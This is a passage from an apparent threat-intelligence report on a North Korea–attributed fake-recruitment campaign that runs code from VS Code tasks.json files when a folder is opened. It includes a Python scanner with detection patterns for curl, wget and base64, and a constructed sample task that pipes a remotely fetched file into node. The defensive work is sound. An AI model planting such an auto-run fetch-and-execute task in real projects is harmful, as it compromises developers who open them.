Contagious Interview: Tracking the VS Code Tasks Infection Vector
Executive Summary
The DPRK-attributed Contagious Interview campaign continues to target software developers through fake recruitment schemes disguised as technical assessments and code reviews of projects hosted on platforms like GitHub. A relatively new technique in the campaign's arsenal leverages Microsoft Visual Studio Code task files (located at .vscode/tasks.json) to achieve malicious code execution upon project open. This report documents our observations tracking this vector, presents GitHub-based discovery methods, highlights unique findings including a newly published malicious Node Package Manager (NPM) package, and outlines detection opportunities for defenders.
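The detection opportunity this vector creates, as an added example that is not code from the report's authors: a Python scanner that parses a repository's .vscode/tasks.json (tolerating the comments and trailing commas VS Code accepts), reports every task that would start automatically on folder open, and tags it with indicators of remote fetch or inline code execution. The sample tasks.json and the host settings.example.invalid are constructed.

```python
import json
import re
# Patterns a legitimate build/test task rarely needs; the names become finding indicators.
SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://", re.I),
    "inline_interpreter": re.compile(r"\b(node\s+-e|python3?\s+-c|(ba)?sh\s+-c)\b", re.I),
    "encoded_payload": re.compile(r"base64|fromCharCode|-EncodedCommand|-enc\b", re.I),
}
# String literals are matched first so a "//" inside a URL is never treated as a comment.
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def strip_jsonc(text: str) -> str:
    """Drop comments and trailing commas: VS Code accepts both, json.loads rejects both."""
    no_comments = _JSONC.sub(lambda m: m[0] if m[0].startswith('"') else "", text)
    return re.sub(r",(\s*[}\]])", r"\1", no_comments)

def task_commands(task: dict) -> list[str]:
    """Join command + args for the task and its windows/linux/osx overrides."""
    cmds = []
    for scope in (task, *(task.get(k, {}) for k in ("windows", "linux", "osx"))):
        cmd = scope.get("command")
        if cmd:  # a string, a list, or a {"value": ..., "quoting": ...} object
            parts = (cmd if isinstance(cmd, list) else [cmd]) + list(scope.get("args", []))
            cmds.append(" ".join(p.get("value", "") if isinstance(p, dict) else str(p) for p in parts))
    return cmds

def scan_tasks_json(text: str) -> list[dict]:
    """One finding per task VS Code would start on folder open, with the indicators it matched."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue  # only auto-run tasks execute without the developer choosing to run them
        joined = "\n".join(task_commands(task))
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(joined)]
        findings.append({"label": task.get("label", "<unnamed>"), "indicators": hits})
    return findings

# Constructed sample (settings.example.invalid is a placeholder): a benign build task beside an
# auto-run task that fetches an OS-specific "settings" file from a remote host and pipes it to node.
SAMPLE_TASKS_JSON = """{
  "version": "2.0.0",  // comments and trailing commas are legal here
  "tasks": [
    {"label": "build", "type": "npm", "script": "build"},
    {"label": "Check Environment", "type": "shell", "runOptions": {"runOn": "folderOpen"},
     "command": "curl", "args": ["-s", "https://settings.example.invalid/settings/linux", "|", "node"],
     "windows": {"command": "curl.exe", "args": ["-s", "https://settings.example.invalid/settings/windows"]},},
  ],
}"""

if __name__ == "__main__":
    print(scan_tasks_json(SAMPLE_TASKS_JSON))
```

An auto-run task with an empty indicator list is still reported, because any command that executes on folder open without the developer's choice deserves review.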
Background
Recent reporting from the security community has documented the campaign's adoption of VS Code task files as an infection vector, ultimately leading to deployment of the BeaverTail downloader and InvisibleFerret backdoor:
- Open Source Malware documented various types of repos containing malicious tasks.json files, associated "code puppets", and a marked reliance on Vercel domains for payload hosting.
- Red Asgard published detailed C2 infrastructure analysis and some …
IoC